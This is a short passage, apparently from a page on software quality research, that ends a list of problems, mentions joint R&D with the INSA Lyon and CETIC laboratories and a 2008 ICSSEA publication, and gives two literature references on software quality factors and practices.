  • Lack of support from quality management

The research and development we have conducted with the INSA Lyon and CETIC laboratories is based on the above research, yet it provides specific responses to these problems. Some of the findings from this research are available in a scientific publication, published by ICSSEA (International Conference on Software & Systems Engineering and their Applications) in 2008.

(1) McCall, J. A., Richards, P. K., and Walters, G. F., "Factors in Software Quality", Nat'l Tech. Information Service, no. Vol. 1, 2 and 3, 1977

(2) J.M. Verner, T.T. Moores, A.R. Barret “Software quality: perceptions and practices in Hong Kong”, Achieving quality in software, Chapman & Hall, 1996, p.77-88